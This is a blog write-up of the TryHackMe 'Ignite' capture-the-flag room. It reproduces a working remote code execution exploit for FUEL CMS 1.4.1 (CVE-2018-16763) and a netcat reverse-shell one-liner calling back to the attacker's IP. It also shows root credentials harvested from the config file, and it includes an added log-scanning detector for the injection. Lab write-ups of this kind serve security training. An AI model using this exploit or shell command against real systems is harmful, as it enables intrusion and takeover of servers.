Ignite - TryHackMe

Ludovic COULON
May 8th, 2020 · 1 min read

TryHackMe | Ignite

A new start-up has a few issues with their web server.

Root the box! Designed and created by DarkStar7471, built by lollava aka Paradox.

Enjoy the room! For future rooms and write-ups, follow @darkstar7471 on Twitter.

First, a port scan:

nmap -sV --script vuln 10.10.217.248

Port 80 is open:

Open the web application in a browser (bottom of the home page):

That's it!
To access the FUEL admin, go to : http://10.10.217.248/fuel
User name: admin
Password: admin

So we have the admin creds, but I'll check whether there is an exploit for Fuel CMS (there is one):

# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763

import requests
import urllib

url = "http://10.10.217.248/" # Target IP
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
    xxxx = input('cmd:')
    url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.parse.quote(xxxx)+"%27%29%2b%27"
    r = requests.get(url)

    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)

    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)

    print(r.text[0:dup])

There you go!
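On the defensive side, every request this script sends hits /fuel/pages/select/ with PHP syntax in the filter parameter, which is easy to spot in the web server's access log. The following is an added example, not part of the original write-up or the exploit: it scans combined-format log lines for that pattern. The function name, the character set treated as suspicious and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request portion of an Apache/nginx "combined" access-log entry.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Assumption: a legitimate filter value never needs quotes, parentheses,
# "$", ";" or backticks, so their presence marks an injection attempt.
SUSPICIOUS = re.compile(r"""['"()$;`]""")
ENDPOINT = "/fuel/pages/select"

def find_filter_injection(lines):
    """Return (client_ip, status, decoded_filter) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        # Collapse leading slashes first: the script builds "//fuel/...", and
        # urlsplit() would otherwise parse "fuel" as a host name.
        parts = urlsplit(re.sub(r"^/+", "/", m["target"]))
        path = re.sub(r"/+", "/", parts.path).rstrip("/").lower()
        if path != ENDPOINT:
            continue
        # parse_qs() percent-decodes, so the check runs on the decoded value.
        for value in parse_qs(parts.query).get("filter", []):
            if SUSPICIOUS.search(value):
                hits.append((m["ip"], int(m["status"]), value))
    return hits

# Constructed sample log; the encoded prefix and suffix are the ones in the
# script above, with "id" standing in for the command.
PAYLOAD = ("%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d"
           "%27%29%29%2b%24%61%28%27" + "id" + "%27%29%2b%27")
SAMPLE_LOG = [
    '10.0.0.5 - - [08/May/2020:10:00:01 +0000] "GET /fuel/pages/select/?filter=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [08/May/2020:10:00:02 +0000] "GET //fuel/pages/select/?filter=' + PAYLOAD + ' HTTP/1.1" 200 4312 "-" "python-requests/2.23.0"',
    '10.0.0.5 - - [08/May/2020:10:00:03 +0000] "GET /index.php?filter=%27x HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, status, value in find_filter_injection(SAMPLE_LOG):
        print(f"{ip} status={status} filter={value!r}")
```

A hit with status 200 on a FUEL CMS version up to 1.4.1 deserves immediate follow-up, since the decoded filter value shows exactly which command was requested.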

✅ You can send a reverse shell through the PHP filter:

cmd: rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.9.45.74 9999 >/tmp/f

✨ Better shell with root access 👀

python -c 'import pty; pty.spawn("/bin/bash")'

With the Python interpreter you now have a better shell. The database config gives us the root password: mememe

su -r root
password: mememe

#1 User.txt

# cd /home/www-data && cat user.txt
6470e394cbf6dab6a91682cc8585059b

#2 Root.txt

# cat root.txt
b9bbcb33e11b80be759c4e844862482d

# cat /var/www/html/fuel/application/config/database.php
$db['default'] = array(
    'dsn' => '',
    'hostname' => 'localhost',
    'username' => 'root',
    'password' => 'mememe',
    'database' => 'fuel_schema',
    'dbdriver' => 'mysqli',
    'dbprefix' => '',
    'pconnect' => FALSE,
    'db_debug' => (ENVIRONMENT !== 'production'),
    'cache_on' => FALSE,
    'cachedir' => '',
    'char_set' => 'utf8',
    'dbcollat' => 'utf8_general_ci',
    'swap_pre' => '',
    'encrypt' => FALSE,
    'compress' => FALSE,
    'stricton' => FALSE,
    'failover' => array(),
    'save_queries' => TRUE
);
